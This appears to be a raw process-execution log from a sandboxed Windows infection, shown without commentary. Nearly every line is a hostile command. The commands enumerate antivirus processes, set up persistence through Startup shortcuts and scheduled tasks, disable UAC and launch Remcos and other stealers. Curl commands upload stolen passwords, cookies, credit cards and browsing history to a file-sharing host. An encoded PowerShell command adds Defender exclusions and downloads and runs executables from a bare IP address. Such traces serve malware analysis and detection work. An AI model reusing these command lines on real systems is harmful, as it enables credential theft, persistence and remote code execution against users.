findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 835450
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Winston + ..\Southwest + ..\W l
C:\Users\Admin\AppData\Local\Temp\835450\Mineral.com
Mineral.com l
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SecureNet Innovations Ltd\NovaGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NovaGuard.url" & exit
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\437139445115_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe
"C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe"
C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe
"C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\njSilent.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\njSilent.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\langla.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\langla.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\437139445115_Desktop.zip' -CompressionLevel Optimal
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA739.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'
C:\Windows\svchost.exe
"C:\Windows\svchost.exe"
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\http.exe
"C:\Users\Admin\AppData\Roaming\http.exe"
C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\609587\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\609587\RegAsm.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\connect.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\connect.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzureConnect.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzureConnect.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Javvvum.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Javvvum.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\archive.htm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffe9dd46f8,0x7fffe9dd4708,0x7fffe9dd4718
C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1984 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2556 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\Desktop\4363463463464363463463463\Files\RambledMime.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\RambledMime.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_8376_133786560773964288\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\Users\Admin\AppData\Local\Temp\shost.exe
shost.exe
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\shost.exe
shost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
C:\Windows\system32\taskkill.exe
taskkill /im firefox.exe /t /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp37FF.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp37FF.tmp.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp3F06.tmp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
C:\Users\Admin\Desktop\New Text Document mod.exse\a\t5abhIx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\t5abhIx.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\patcher.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\patcher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pHash.bat
C:\Users\Admin\Desktop\4363463463464363463463463\Files\spectrum.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\spectrum.exe"
C:\Windows\system32\curl.exe
curl -o "pHash" "http://144.172.71.105:1338/nova_flow/patcher.exe?hash"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\xworm.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\xworm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7784 -ip 7784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 236
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
C:\Windows\SYSTEM32\schtasks.exe
